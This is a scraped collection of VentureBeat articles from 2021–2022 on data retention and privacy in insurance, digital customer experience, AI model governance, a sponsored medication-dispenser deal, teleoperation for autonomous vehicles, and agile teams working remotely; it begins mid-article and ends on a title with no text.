proceedings, or improper/accidental deletion of corporate records, far outweighed the benefit of deleting anything. Legal and compliance teams are battle-scarred from over a decade of litigation and regulatory enforcement actions where data issues were at the forefront. But this experience also taught these teams there is risk associated with information, and they can see that the calculus of keeping data versus deleting data is changing. In addition, early experience with global privacy requirements, such as GDPR, has provided further risk validation. The new calculus is based on a balance of variables and a multiplying factor that is associated with sensitive information. First, all parts of an organization need to accept that possession of information represents risk, in addition to value. Second, sensitive information that may provide high levels of insight carries equal levels of potential risk. Finally, enterprises need to establish effective means to dispose of information they do not need once its value and retention obligations have passed. The big new variable: privacy The insurance industry is not often viewed as a driving force behind change. It is highly regulated in most jurisdictions and has developed risk models based on a long history of claims and events. These dynamics have effectively forced the industry to adapt slowly to change, require significant retrospective data analysis and maintain long data retention periods. And yet, we may see the insurance industry now quietly leading the new charge. Long before big data, machine learning and advanced analytics ever graced the latest technology journals, actuarial sciences in the insurance industry had blazed a trail. However, analyses were largely backward-looking, based on similar previous events, to predict future risk. In recent years, the insurance industry adopted practices that created vast amounts of information, consumed in real-time, to develop its models. In the process, the industry created new risk, which it is still trying to fully comprehend. For example, many insurance companies now offer potential savings in automotive insurance if allowed to monitor driving habits in real-time. These applications capture tremendous amounts of information, from duration, distance, acceleration, speed and other attributes for a given individual. This allows the companies to create models of risk and alter coverage rates based on this analysis. At the same time, they are creating vast amounts of sensitive private information. Insurance companies also now develop insurability scores and models, based on extraordinary aggregation of publicly and privately available data. The aggregation of this data comprises some of the most expansive views of an individual’s habits, practices and personal information. It is updated constantly by them, providers and third-party suppliers, and feeds any number of models, systems and automated processes. All this data creates value in developing risk models and serving customers. But it also generates a tremendous amount of highly-sensitive, private information. Actuaries on the job The National Association of Insurance Commissioners (NAIC) is an organization that few have likely encountered. Insurance regulation is largely state-based in the U.S., and NAIC creates standards and model rules to be adopted as practices by insurance companies or codified in statute or regulation. The NAIC has a history of model rules that deal with information security, records retention and privacy, focused on protecting information and organizations and availability of data to regulators. However, with new statutes being adopted across many U.S. states, and experience with the EU’s General Data Protection Regulation (GDPR) that governs the use, access and rights associated with information, NAIC realized a more privacy-centric model was necessary. Through a working group , they sought to distill obligations and lessons from GDPR, along with the CCPA, CPRA and CDPA, and provide a common set of requirements that include : Right to opt out of data sharing Right to limit data sharing unless the consumer opts in Right to correct information Right to delete information Right to data portability Right to restrict the use of data The elements are not particularly unique, but the insurance industry was among the first to realize that the sheer scale of what may confront them from a privacy perspective could overwhelm existing technologies and practices. Nearly every single person in global developed markets is a customer of an insurance company. What happens if just a fraction exercise one of the rights noted above? It will dwarf the volume of preservation requests handled for litigation or regulatory purposes. And what about all the sensitive information that is long past its retention requirements, but was never deleted? Burning the undergrowth: establishing the value of your data Enterprises need to establish practices and technologies that address the full range of privacy obligations in the EU and emerging in the U.S. Ridding your organization of information with limited value or beyond its retention period is a critical first step. Many organizations have struggled with routine data deletion; now they must prepare for doing so on-demand, potentially from many of their customers. Like undergrowth in the forest, information provides value up to a point. It then risks burning the whole forest if not managed or removed. Organizations should start with establishing the value of information and clearly understanding what represents undergrowth and risk. Then, they should light the match and burn what they should not have or no longer need. George Tziahanas is managing director at Breakwater Solutions. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,073
2,022
"How digital experiences are fueling the new digital economy | VentureBeat"
"https://venturebeat.com/2022/01/15/how-digital-experiences-are-fueling-the-new-digital-economy"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community How digital experiences are fueling the new digital economy Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Ken Fine, CEO of Heap The reign of the digital economy is upon us. It’s become increasingly difficult to differentiate between the digital economy, the physical economy, and service economies since digital technology and the internet now mediate so many transactions across every industry. By now, even the traditional barbershop has realized that offering a great digital experience is the key to business survival. “The digital economy” and “the economy” may not yet be synonymous, but that gap is quickly closing. A recent analysis predicted that digital and digital-transformed businesses would account for $53.3 trillion, roughly half the United States’ Gross Domestic Product, by 2023. And, because these projections don’t account for free goods and services in the digital economy, some economists believe that the given estimates are likely too conservative. New expectations are the new normal In 2011 venture capitalist Marc Andreessen observed that “software is eating the world.” Ten years later, the coronavirus pandemic has only made tech hungrier. The emblematic experience is now digital, unfolding on the screens of our computers, tablets, and phones. In the first lockdowns, people who might never have ordered groceries began using mobile apps like DoorDash; an obscure teleconferencing system Zoom became as familiar as Google and Facebook. With emergency rooms overfull and hospital staff overextended, many routine medical interactions migrated to telehealth, which McKinsey predicts could be a quarter-trillion-dollar business. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! For businesses in the digital economy, the biggest byproduct of moving everything on-screen and online was that consumers increasingly expect their needs to be met through digital experiences. The average consumer has now internalized Amazon-style one-click convenience as their baseline. Disappoint them and they’ll take their business elsewhere, “walking” to the next business with a few screen taps or keystrokes. A sticking point that slowed down a transaction yesterday is likely to cancel that transaction today. When a check can’t be deposited via a credit union’s phone app, when a local restaurant’s website doesn’t load, when a digital storefront is not integrated with familiar payment processors — customers simply leave. And odds are they won’t return to give the platform a second chance. The three I’s in a digital economy How will businesses compete in this increasingly digital environment? Just as they have always done: serving the needs of their customers. What’s changed is that being a leader today means setting the bar for the digital experience, and then raising it, again and again. The best companies will do this by adhering to the three i’s: information, insight, and iteration. Armed with a wealth of data and a powerful set of new tools, the next generation of industry leaders will be those who focus on continuously improving the digital experience they provide their customers. With frequent releases and updates, they’ll keep setting — and then exceeding — new standards of accessibility and ease-of-use. Information Digital businesses produce terabytes worth of information every day, but relatively few businesses capture all the data their customers produce. This is leaving money on the table in a digital economy. How long does the average potential customer spend on the website or in the app? Where do customers exit the sales funnel? What age groups don’t react to your sales pitches, and in which cities do your biggest fans reside? This information is the foundation of best-of-breed digital experiences. Insight Data tells stories that people alone cannot decipher. While broad trends may be obvious even to an amateur at statistics, best-in-class insight draws on the subtle, the hidden, and the counterintuitive. A portion of your website that seems intuitive and friendly to your design team might in reality be a point of consumer friction; another page might send unduly high numbers of customers to their browsers’ “back” buttons. Assumptions and gut feelings about customer experience may not reflect reality, and even when they’re broadly correct, specifics are more useful than generalities. Iteration All the insight in the world is useless unless it’s put into practice. In a time of rapid and disconcerting change, businesses cannot rest on past accomplishments: They must continuously reintroduce and refine their offerings. A/B testing, revised sales funnels, and tweaked landing pages all have parts to play. The most successful of today’s major digital economy players, like Amazon, Netflix, and Google, are constantly tweaking their websites and updating their apps in hopes of producing “stickier” and more convenient experiences. The information-insight-iteration cycle should only end when the business does: Each new product iteration that goes online provides further information for the business to distill into insight. This knowledge gets quickly incorporated into the next release. The customer gets a better and more satisfying experience; the company increases revenue and lifetime value. As the OECD reported, the economy now faces “COVID-19 induced digital acceleration.” The digital economy of 2023, when digital business is set to account for half of GDP, will doubtless hold many surprises for even the best-informed prognosticator. Businesses cannot expect that their December 2021 offerings will suffice for January 2022, much less January 2023. As we enter a new era of digital competition, the would-be winners of tomorrow must continue to gather the data that they need to innovate and to iterate. Customers demand better digital experiences. Businesses that fail to adapt should plan for obsolescence. Ken Fine is the CEO of Heap. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,074
2,022
"How to identify the right AI model governance solution for your business | VentureBeat"
"https://venturebeat.com/2022/02/01/how-to-identify-the-right-ai-model-governance-solution-for-your-business"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community How to identify the right AI model governance solution for your business Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Harish Doddi, CEO of Datatron. The pandemic has wreaked havoc on the carefully developed AI models many organizations had in place. With so many different variables shifting at the same time, what we’ve seen in many companies is that their models became unreliable or useless. Having good documentation showing the lifecycle of a model is important, but that still doesn’t provide enough information to go on once a model becomes unreliable. What’s needed is improved AI model governance, which can help bring greater accountability and traceability for AI/ML models by having practitioners address questions such as: Which input variable are entering the model? What are the output variables? How does the model behave in terms of certain metrics? What were earlier versions like? Who has access to it? Has any unauthorized person gained access to it? How exactly does AI model governance help tackle these issues? And how can you ensure you’re using it to best fit your needs? Read on. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Too much manual effort Data scientists use a variety of tools to develop their models, whether it’s SAS, R, Python, or the multitude of machine learning software libraries available today. With machine learning still in its nascency, there are a ton of options to choose from. Some use cases are simply more effective with certain languages or frameworks, for example, and data scientists tend to be relatively loyal to one language over another. Since this field is so specialized and data scientists are so few, their work is siloed from the rest of the enterprise. This makes it difficult for the primary IT or oversight body to guarantee appropriate company-wide governance and audit of models. That means this body will need to exert major manual effort to go to all the various departments and gather the needed model governance information. They can overcome this issue by implementing an AI governance solution. Evaluating AI governance solutions There are certain expectations, rules, and assumptions that ML models must abide by during the development process. When these models are deployed into production, they can yield quite different results from those in controlled development environments. Governance is critical here. Those involved in governance must have a means of tracking the different models and the different versions associated with the models. For an AI governance solution to be effective, its catalog must have the ability to track and document the framework that the models are developed in. In addition, the catalog must have the ability to ensure model lineage where it associates the models with the functionality features within the models. Importantly, it enables computation of the appropriate governance metrics of the various features. In recent years, as more organizations have operationalized ML models , their dark side has emerged in the form of biases and other issues. An example would be a financial institution whose models recommend offering lower credit limits to women compared to men living in the same home. It’s necessary to have the ability to compute and track metrics that might affect these models, such as anomalies, risks, levels of performance, biases, and data drifts. It’s not possible to simply calculate them in a lab; calculations must be done when the models are in production. You’ll need a dashboard that can display these metrics to your data scientists and your business users. The metrics need to be displayed in such a way as to alert business users to potential issues. And your data scientists need to see the metrics that will guide them to those possible issues. You’ll also need a feature that enables you to identify potential anomalies based on the business-specific thresholds you set — and to notify both parties if something’s off without overwhelming them with false alarms. ML models need secure access Particularly in larger organizations, model security is crucial. Serious problems could occur should a model accidentally get exposed to the wrong department. For instance, imagine that ML models have been successfully optimized to increase revenue by a few points. Now imagine that another department incorrectly uses those models. That could expose the company to fines equaling millions of dollars for regulatory violations. It’s possible to tweak and reverse-engineer models, but if you don’t understand their original context, your organization could be at risk from possible potential iteration programs. In this case, the tweaked models aren’t doing what they’re documented to be doing. Model governance has left the building. It’s important to require permission to access sensitive models that shouldn’t be shared with other departments. To make certain that no unauthorized parties — including applications — can get access to your model, you need encryption and an audit trail. You have to set up a method that guarantees traceability, transparency, and accountability. Standardization is key It’s obvious that a model governance solution offers many benefits, but implementation can be a challenge. Speed, cost, and effectiveness are likely to suffer from the complex review flows of AI model governance. Consistency is a big problem. Your governance solution must be applicable across all models, not just to certain business departments. Not all solutions offer standardization, so add that item to your list when vetting them. Making your models successful Some organizations have had to scramble as the pandemic weakened or destroyed their AI and ML models. This also highlighted the need for model governance to improve accountability and traceability for machine learning models. A model governance solution, properly vetted, will reduce risks and increase the likelihood of successful models that will serve business goals. Harish Doddi is the CEO of Datatron. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,075
2,021
"IoT devices and apps are changing med management for the better | VentureBeat"
"https://venturebeat.com/2021/07/30/iot-devices-and-apps-are-changing-med-management-for-the-better"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Sponsored Deals IoT devices and apps are changing med management for the better Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. If you’ve ever felt like every doctor’s appointment ends with a new prescription, you’re probably a little overwhelmed by trying to keep your medications straight. Which ones are okay to take at night and which ones have to be taken with breakfast? Did you order a refill for that medication that’s about to run out? And did you even take those pills this morning like you were supposed to? If only there was a way for something else to keep track of your regimen and make sure you’re staying on schedule. Fortunately, technology is integrating with healthcare at an impressive rate, and patients are hopeful for more at-home tools to help them manage their medical conditions. Enter Hero: the new way to manage your meds. Their service includes the only app-integrated automatic pill dispenser that sorts and dispenses your medications according to your prescribed schedule, send you dosage reminders via phone notifications, plus orders refills for you and delivers them directly to your door. Getting started with the app on your device is simple. Whether you have iOS or Android, download the app and enter your medication information into your account. Then, add up to 90 day’s worth of 10 different medications into the connected pill dispenser. When synced with the app, the pill holder sorts and distributes the right medications at the right time. With just a push of the button, you’ll have your meds conveniently dispensed when you need them. But Hero is about more than just convenience. When you’re dealing with polypharmacy treatment plans, keeping track of medications can be the difference between staying healthy and winding up in the hospital. The steeper costs of healthcare associated with medication adherence issues can include the costs of urgent care and hospital stays, as well as in-home medication management help. Fortunately, lessening the burden of these costs can come directly from better medication management. Becoming a Hero member grants you access to the dispenser, connected app and their prescription refill and delivery service. Hero is also FSA/HSA eligible, bringing some more savings to your wallet. Plus, you can currently save $50 off your initiation fee so you can get started with better medication management as soon as possible. “VentureBeat Deals is a partnership between VentureBeat and StackCommerce. This post does not constitute editorial endorsement. If you have any questions about the products you see here or previous purchases, please contact StackCommerce support here. Prices subject to change.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,076
2,021
"13 challenges that come with autonomous vehicles | VentureBeat"
"https://venturebeat.com/2021/11/25/13-challenges-that-come-with-autonomous-vehicles"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages 13 challenges that come with autonomous vehicles Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Teleoperation: the technology that enables a human to remotely monitor, assist and even drive an autonomous vehicle. Teleoperation is a seemingly simple capability, yet it involves numerous technologies and systems in order to be implemented safely. In the first article of this series, we established what teleoperation is and why it is critical for the future of autonomous vehicles (AVs). In the second article , we showed the legislative traction and emphasis gained for this technology. In the third and fourth articles, we explained two of the many technical challenges that needed to be overcome in order to enable remote vehicle assistance and operation. The fifth article explained how this is all achieved in the safest possible way. In this installation, we will get to the most important person in the entire loop, the customer. There is an Israeli journalist, Sarah Tuttle-Singer, who writes the stories she hears from taxi drivers. She has so many that she even wrote a book with the best of them. This makes perfect sense. Cabbies spend all day riding around with different passengers and when people are bored, they talk. Invariably, taxi drivers have a million anecdotes to share. Unfortunately with the oncoming transition to autonomy , these stories will go away. The problem with autonomous vehicles There is an existential issue with removing a driver from the vehicle. You simply cannot provide 100% service availability nor a satisfactory level of customer experience, not today and not in 50 years. Human interaction is mission-critical. There are many cases where an autonomous system is incapable of responding to the level that the customer desires and is entitled to. The lack of a human behind the wheel not only means that there will be vehicle downtime due to being confused by different situations but that seemingly simple services cannot be delivered. The reason is simple, a machine does not know how to interact with a human the same way that a human does. The customer experience is possibly the biggest issue of them all when it comes to autonomy and they come in four main categories: passenger concerns, emergencies, deliveries, and attended zones. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Above: Image via Stockphoto.com, licensed to Amit Rosenzweig Passenger concerns 1. Passenger discomfort : Maybe they feel anxious or unsafe. With no human driver to respond to their need the passenger has no one to communicate with; no one to assuage their fears, reassure them, or address the source of the problem. 2. Controlling the A/C or infotainment system : Not every passenger has the same comfort levels or needs, and not everyone knows how to operate certain systems. Issues with temperature control or onboard entertainment are inevitable. Yet there is no one to talk to. 3. Particular drop-off points: Currently, when you arrive near your destination you simply say, “can you drop me off by that door/car/tree/etc?” and typically the driver will do just that. With a self-driving system not only will it not be able to do that but it might bring you to what is technically the right address but not an ideal spot for easy access. This is especially important for older passengers and people going for medical treatments. 4. Passenger infractions: Not all issues stem from the vehicle. What if the passenger is not wearing a seatbelt, or there are too many people crowding the back seat? A human driver would set them straight, and the problem would be solved. Would a robot taxi even be able to recognize these issues let alone handle them? 5. Forgotten items or worse, forgotten baby: In 1999 world-famous cellist Yo-Yo Ma forgot his 2.5M dollar cello in a taxi. Passengers have even forgotten sleeping children. Right now it’s easy to call the driver (whose number is on the receipt). This is no longer an option when there is no driver who can pull over and check the vehicle for people or possessions. Above: Image via Stockphoto.com, licensed to Amit Rosenzweig 6. Vandalism: Unfortunately not all people are good. In fact, some are rather bad, while others such as teenagers are simply careless and indifferent. Passengers can damage or ruin a vehicle during a ride. Without the watchful eyes of a driver, this behavior would go unchecked. The result is higher maintenance costs, reduced profits, and downtime for the vehicle. Emergencies 7. Law enforcement: When a vehicle is driving erratically or there is a matter that needs investigation, police use a speaker to alert the driver to pull over. With no driver on board, the police are unable to do their job, and the consequences can be unfortunate. Above: Image via Stockphoto.com, licensed to Amit Rosenzweig 8. Medical/Ambulances: Similar situation to the police. Perhaps a passenger is having a medical issue and manages to make a 911 call. The vehicle still needs to know where and when to stop to let the medical professionals give the passengers the necessary treatment they need. Deliveries 9. Wrong/damaged/missing package: When you receive a package from a courier they hand it to you and ask you to sign for it. If the package received is badly damaged, or simply the wrong thing, you can tell them and they handle it. If you are missing an item, they will go back and bring what they forgot. A robot would simply move on to its next destination automatically. 10. Finding the right customer: Today there are only a few vendors with delivery bots. However, these numbers will multiply as the technology improves and production costs drop. Soon there will be many robots with many recipients. A delivery bot might find itself making a drop-off to a location where multiple people are waiting for different orders. To the computer, it is impossible to ascertain which human it needs to make its delivery. This may result in a confused device and a frustrated customer. Attended zones 11. Content validation: When a truck arrives for a pickup or drop off there is a need for the gate attendant to confirm the records, the contents of the delivery, and to direct the vehicle to its specific parking slot or loading dock. An autonomous system does not respond well to pointing in a direction or verbal commands, nor can it explain why there might be a discrepancy between the information it has and the instructions given by the attendant. 12. Changing orders: Once inside a facility, there may be someone who needs to redirect a vehicle from one task to another. This is especially true with construction zones where one vehicle might have a number of tasks and their order changes. There is no way for that person in the field to communicate these changing needs. 13. Damages : Once the vehicle has arrived there will be some level of vehicle inspection. If there is something wrong with the vehicle or damage has been incurred there is no one to tell. The solution For those who read the previous articles in this series, the answer should be obvious. For those who did not, the solution is to have a remote human in the loop. Currently, none of the aforementioned issues is a problem as there are human drivers and couriers. Autonomy cannot resolve these problems. A human being will still be needed to manage these issues in the most effective, efficient, and safe way possible. This is why teleoperation is the only choice. However, as with most solutions, it has its own challenges. Bringing a human into the loop When a teleoperation session is triggered it does not simply go to the first available teleoperator (TO). This is for the same reason that when you call customer service there is a routing system that, based on your input, will route you to the agent with the expertise you need. However, unlike a regular call center, the customer does not necessarily have the option to “press three for traffic issues” or “press pound to repeat this message”. The first possible solution would be for there to be a teleoperation manager (TM) who will answer the calls for assistance first and, upon ascertaining the level of complication and need, route the session to a specific operator. This would be highly inefficient and would mean the TM is not available to do their actual job — managing. Instead, there needs to be an automatic and intelligent way to route the need for human intervention without… human intervention. When a teleoperation session is triggered the first thing that is automatically ascertained is the source of the request. Did the passenger trigger the need for a TO? Was it a first responder or law enforcement? Or was it the vehicle itself? Each of these situations calls for a different type of response and therefore a different type of TO. Within a given teleoperation team there will be some who are junior and some who are senior, some who are more customer-oriented, and others who are more technical. A senior TO might be authorized for remote assistance and remote driving while their junior counterpart is only allowed to assist. Some TOs might be primarily for customer interaction situations so if the session is triggered by the customer they will be the ones looped in. On the other hand, if the vehicle triggers the session, not because of a confusing traffic situation but because of a technical issue, an entirely different response would be needed. Remote assistance is complex We just established that the seemingly simple aspect of who answers which call is complicated. For the challenges in even establishing that connection, refer to our previous articles about network connectivity and video compression. There is still another challenge. Once the teleoperation session is started, the TO has to understand what exactly is going on. There is a serious amount of information they need to receive that must be layered into their display so they can better understand the situation. This issue multiplies when hopping between numerous vehicles. There have to be processes and tools built-in so that there is minimal delay between the start of a session and the goal of solving the problem for the vehicle and to the customer’s satisfaction. Enabling autonomy If autonomous vehicles providers ever want to have mass deployed robot fleets they must ensure the human is in the loop. It is a complicated and complex process from beginning to end and a completely different technology from the autonomy itself. This is why teleoperation vendors exist and why industry leaders like Motional choose to rely on them for this mission-critical function. Anything else and they are not on the right track towards the self-driving future. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,077
2,021
"The agile team has gone home. Now what? | VentureBeat"
"https://venturebeat.com/2021/09/11/the-agile-team-has-gone-home-now-what"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Guest The agile team has gone home. Now what? Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Agile may be synonymous with software development, but it is equally about people. Because the purpose of agile sprints is to incorporate feedback at quick intervals to deliver what customers want. And the agile process itself works best with close collaboration between developer and stakeholder groups, also bringing together development and IT operations teams when used in conjunction with DevOps. So it is no surprise that there is a strong correlation between an enterprise’s growth and its agile capability: 6 of the top 7 agile levers by impact were people-related. (My team published some recent research on this.) A core principle of agile transformation is to use face-to-face interaction, which went right out the window when the pandemic hit. However, the use of agile has actually increased over the past year while almost everyone around the world was working remotely. Reconciling these seemingly opposite shifts makes for an interesting challenge for enterprises. But it is not an impossible one. Consider the following key agile levers, all impacting people dynamics: Workforce and workspace levers Using agile virtual workspaces along with digital collaboration platforms to support remote but collective and cohesive work has been a big driver of success. At my company, we conducted a study of our own employees right before and just into the pandemic, and it showed that when 3 or more early agile sprints were conducted on-premises with workers coming to the office, it paved the way for the asynchronous communication and remote work that followed. At the same time, using digitized visual Kanban dashboards along with other collaboration accelerators helped our remote teams make better decisions and operate as productively as they did when they were on-premises. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Culture levers Autonomous and self-managed teams are able to focus better on value delivery, which improves customer experience and return on investment. Similarly, self-organized agile teams improve technology outcomes. A hybrid working model can complicate this, though. When agile development goes from on-premises to remote – especially without warning as it did last year – the teams risk losing visibility of the status of different projects, their business and technical contexts, and even the pathways of communication. We found from our experience that enabling early, incremental feedback to remote teams helped them stay on track or correct course on time when needed. This also coordinated the efforts of developers working on different parts of the same module and gave them a shared sense of purpose. Organization structure levers Several enterprises have adopted agile processes and techniques outside the IT function, in areas such as business operations, human resources, sales, and even legal. This sets the stage for effective collaboration across functional boundaries. As we look at our employees, we see that cross-functional collaboration can be made to work even in a remote or hybrid work situation. When we increased the proportion of cross-skills in our remote teams by 15% to 20%, they became as productive as they were in office. While this experiment was confined to the IT function, there is every reason to believe that the results would be similar even when cross-skills across functional lines are combined. The skills need not always be available in-house; enterprises can even tap the gig economy quite effectively. When it comes to applying agile principles to people in the hybrid work world, here are some questions to ponder: Do you have enough digital visualization processes to help remote workers catch up with their on-prem peers? Do you offer frequent, incremental, and early insights from feedback to remote working teams to help them stay tuned to the project’s vision? Through the iterative cycles of agile learning and working, are you creating virtual safe spaces where the team can learn from its mistakes and table requests in the absence of impromptu interactions? Too much collaboration can take away from productive individual work time. Is your work culture cognizant of this potential pitfall? Are your teams buoyed by “feel good” spikes from socio-emotional cues as they work in the hybrid mode? The bottom line For enterprises with entrenched agile principles and practices, switching to a hybrid working model requires significant adjustment. But with the right adaptation of practices and some changes around technology tools and platforms, functional skills, and organization structure and culture, agile teams can perform comparably to how they used to when they worked in the office. Alok Uniyal is VP & Head of the IT Process Consulting Practice at Infosys and specializes in helping organizations embrace new ways of working by leveraging lean, Agile, DevOps, and design thinking. He also spearheads the Agile and DevOps transformation within Infosys. ( Twitter ) DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,078
2,022
"9 warning signs you aren’t ready to scale | VentureBeat"
"https://venturebeat.com/2022/03/27/9-warning-signs-you-arent-ready-to-scale"
